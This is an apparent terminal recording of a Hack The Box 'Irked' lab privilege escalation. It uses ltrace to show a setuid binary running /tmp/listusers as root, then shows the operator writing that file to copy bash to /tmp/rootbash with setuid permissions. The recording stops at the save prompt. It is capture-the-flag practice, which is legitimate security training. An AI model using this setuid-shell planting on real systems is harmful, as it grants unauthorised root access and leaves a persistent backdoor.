[16.464541, "o", "\u001b]52;;c3lzdGVtKCIvdG1wL2xpc3R1c2VycyJzaDogMTogL3RtcC9saXN0dXNlcnM6IG5vdCBmb3VuZAo=\u0007\u001b[24;5H\u001b[?2004h"]
[16.466369, "o", "\u001b[?25l\u001b[37m\u001b[1m\u001b[H┌──(\u001b[34mroot💀kali\u001b[37m)-[\u001b[39m~/htb/irked/10.10.10.117/loot\u001b[37m]\u001b(B\u001b[m\u001b[K\u001b[37m\u001b[1m\r\n└─\u001b[34m#\u001b(B\u001b[m ltrace ./viewusers\u001b[K\r\n__libc_start_main(0x5656a57d, 1, 0xffdb5c54, 0x5656a600 <unfinished ...>\u001b[K\r\nputs(\"This application is being devleo\"...This application is being devleoped to set and test user permissions\u001b[K\r\n)                                                               = 69\u001b[K\r\nputs(\"It is still being actively devel\"...It is still being actively developed\u001b[K\r\n)                                                               = 37\u001b[K\r\nsystem(\"who\"root     tty7         2022-08-25 02:16 (:0)\u001b[K\r\nroot     pts/4        2022-09-10 04:35 (tmux(351768).%58)\u001b[K\r\nroot     pts/3        2022-09-10 05:56 (tmux(351768).%66)\u001b[K\r\nroot     pts/7        2022-09-10 15:25 (tmux(351768).%67)\u001b[K\r\nroot     pts/2        2022-09-10 05:22 (tmux(351768).%63)\u001b[K\r\nroot     pts/0        2022-09-10 04:30 (tmux(351768).%54)\u001b[K\r\n <no return ...>\u001b[K\r\n--- SIGCHLD (Child exited) ---\u001b[K\r\n<... system resumed> )"]
[16.466404, "o", "                                                                                    = 0\u001b[K\r\nsetuid(0)                                                                                                 = 0\u001b[K\r\nsystem(\"/tmp/listusers\"sh: 1: /tmp/listusers: not found\u001b[K\r\n <no return ...>\u001b[K\r\n--- SIGCHLD (Child exited) ---\u001b[K\r\n<... system resumed> )                                                                                    = 32512\u001b[K\r\n+++ exited (status 0) +++\u001b[K\u001b[37m\u001b[1m\r\n┌──(\u001b[34mroot💀kali\u001b[37m)-[\u001b[39m~/htb/irked/10.10.10.117/loot\u001b[37m]\u001b(B\u001b[m\u001b[K\u001b[37m\u001b[1m\r\n└─\u001b[34m#\u001b(B\u001b[m \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                 "]
[16.466419, "o", "                         0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:bash* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                          \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:01 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[24;5H"]
[17.465329, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:bash* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                          \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:02 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[24;5H"]
[17.710372, "o", "\u001b[1;82r\u001b[1;1H\u001b[2;82r\u001b[81S\u001b[1;1H\u001b[K\u001b[37m\u001b[1m┌──(\u001b[34mroot💀kali\u001b[37m)-[\u001b[39m~/htb/irked/10.10.10.117/loot\u001b[37m]\r\n└─\u001b[34m#\u001b(B\u001b[m \u001b[1;83r\u001b[2;5H"]
[17.988733, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:bash* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                          \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:03 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[2;5H"]
[19.239956, "o", "\u001b[?25l\u001b[Hircd@irked:/tmp$ \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:04 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;18H\u001b[?2004l"]
[20.475094, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:05 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;18H"]
[20.925556, "o", "n"]
[20.996902, "o", "a"]
[21.092583, "o", "n"]
[21.141857, "o", " "]
[21.17926, "o", "o"]
[21.455372, "o", "/"]
[21.475891, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:06 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;24H"]
[21.763816, "o", "\b\u001b[K"]
[21.91442, "o", "\b\u001b[K"]
[22.162769, "o", "\b\u001b[K"]
[22.312598, "o", "o"]
[22.474865, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:07 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;22H"]
[22.552907, "o", " "]
[22.676219, "o", "/"]
[22.866428, "o", "t"]
[22.974579, "o", "m"]
[23.025285, "o", "p"]
[23.281408, "o", "/"]
[23.479388, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:08 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;28H"]
[23.561439, "o", "l"]
[23.741846, "o", "i"]
[23.797472, "o", "s"]
[24.445924, "o", "t"]
[24.481042, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:09 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;32H"]
[24.57056, "o", "u"]
[24.706767, "o", "s"]
[24.787701, "o", "e"]
[24.97042, "o", "r"]
[25.059363, "o", "s"]
[25.240026, "o", "\r\n"]
[25.277062, "o", "\u001b[?25l\u001b[7m\u001b[H  GNU nano 2.2.6                                           File: /tmp/listusers                                                                                             \u001b(B\u001b[m\u001b[2;1H\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[80;80H\u001b[1K\u001b[7m\u001b[C[ New File ]\u001b(B\u001b[m\u001b[K\u001b[7m\r\n^G\u001b(B\u001b[m Get Help\u001b[17X\u001b[7m\u001b[17C^O\u001b(B\u001b[m WriteOut\u001b[17X\u001b[7m\u001b[17C^R\u001b(B\u001b[m Read File\u001b[16X\u001b[7m\u001b[16C^Y\u001b(B\u001b[m Prev Page\u001b[16X\u001b[7m\u001b[16C^K\u001b(B\u001b[m Cut Text\u001b[17X\u001b[7m\u001b[17C^C\u001b(B\u001b[m Cur Pos\u001b[K\u001b[7m\r\n^X\u001b(B\u001b[m Exit\u001b[21X\u001b[7m\u001b[21C^J\u001b(B\u001b[m Justify\u001b[18X\u001b[7m\u001b[18C^W\u001b(B\u001b[m Where Is\u001b[17X\u001b[7m\u001b[17C^V\u001b(B\u001b[m Next Page\u001b[16X\u001b[7m\u001b[16C^U\u001b(B\u001b[m UnCut Text\u001b[15X\u001b[7m\u001b[15C^T\u001b(B\u001b[m To Spell\u001b[K\u001b[?12l\u001b[?25h\u001b[3;1H"]
[25.48074, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:10 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[3;1H"]
[26.115796, "o", "\u001b[1;163H\u001b[7mModified\u001b[3;1H\u001b(B\u001b[m#"]
[26.220415, "o", "!"]
[26.38455, "o", "/"]
[26.485452, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:11 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[3;4H"]
[26.575203, "o", "b"]
[26.657848, "o", "i"]
[26.730177, "o", "n"]
[26.971935, "o", "/"]
[27.051194, "o", "b"]
[27.197391, "o", "a"]
[27.26911, "o", "s"]
[27.306024, "o", "h"]
[27.451327, "o", "\r\n"]
[27.483601, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:12 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[4;1H"]
[27.596594, "o", "c"]
[27.66528, "o", "p"]
[28.34373, "o", "\b \b"]
[28.486582, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:13 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[4;2H"]
[28.494954, "o", "\r\u001b[K"]
[28.659133, "o", "\r\n"]
[28.743384, "o", "c"]
[28.852222, "o", "p"]
[29.17066, "o", " "]
[29.432565, "o", "/"]
[29.489409, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:14 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[5;5H"]
[30.039192, "o", "b"]
[30.149075, "o", "i"]
[30.237355, "o", "n"]
[30.451563, "o", "/"]
[30.490158, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:15 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[5;9H"]
[30.521641, "o", "b\u001b[80;1H\u001b[K\u001b[5;10H"]
[30.664564, "o", "a"]
[30.731119, "o", "s"]
[30.79373, "o", "j"]
[30.952429, "o", " "]
[31.257772, "o", "\b"]
[31.391827, "o", "\b \b"]
[31.488655, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:16 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[5;12H"]
[31.657614, "o", "\b \b"]
[32.254865, "o", "s"]
[32.336036, "o", "h"]
[32.489403, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:17 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[5;13H"]
[32.556311, "o", " "]
[32.712535, "o", "/"]
[32.866833, "o", "t"]
[32.995352, "o", "p"]
[33.442808, "o", "\b \b"]
[33.491381, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:18 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[5;16H"]
[33.666348, "o", "m"]
[33.703465, "o", "p"]
[33.914333, "o", "/"]
[34.034407, "o", "r"]
[34.150726, "o", "o"]
[34.299759, "o", "o"]
[34.378276, "o", "t"]
[34.471509, "o", "b"]
[34.491967, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:19 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[5;24H"]
[34.605643, "o", "a"]
[34.656621, "o", "s"]
[34.696052, "o", "h"]
[34.8325, "o", " "]
[35.237573, "o", "\b"]
[35.381585, "o", ";"]
[35.493556, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:20 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[5;28H "]
[35.630734, "o", "c"]
[35.781925, "o", "h"]
[35.970092, "o", "m"]
[36.032448, "o", "o"]
[36.14174, "o", "d"]
[36.28252, "o", " "]
[36.4933, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:21 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[5;35H"]
[36.605803, "o", "4"]
[36.701232, "o", "7"]
[36.950953, "o", "5"]
[37.151628, "o", "5"]
[37.282633, "o", " "]
[37.493328, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:22 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[5;40H"]
[37.666079, "o", "/"]
[37.87171, "o", "t"]
[37.95582, "o", "m"]
[38.00836, "o", "p"]
[38.246531, "o", "/"]
[38.386296, "o", "r"]
[38.496579, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:23 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[5;46H"]
[38.50053, "o", "o"]
[38.648501, "o", "o"]
[38.710439, "o", "t"]
[38.857283, "o", "b"]
[38.974344, "o", "a"]
[39.011611, "o", "s"]
[39.060354, "o", "h"]
[39.260594, "o", ";"]
[39.497084, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:24 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[5;54H"]
[40.1525, "o", "\u001b[80;1H\u001b[7mSave modified buffer (ANSWERING \"No\" WILL DESTROY CHANGES) ?                                                                                                                \u001b[81;1H Y\u001b(B\u001b[m Yes\u001b[K\r\n\u001b[7m N\u001b(B\u001b[m No  \u001b[9C\u001b[7m^C\u001b(B\u001b[m Cancel\u001b[K\u001b[80;62H"]
[40.496421, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:25 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[80;62H"]
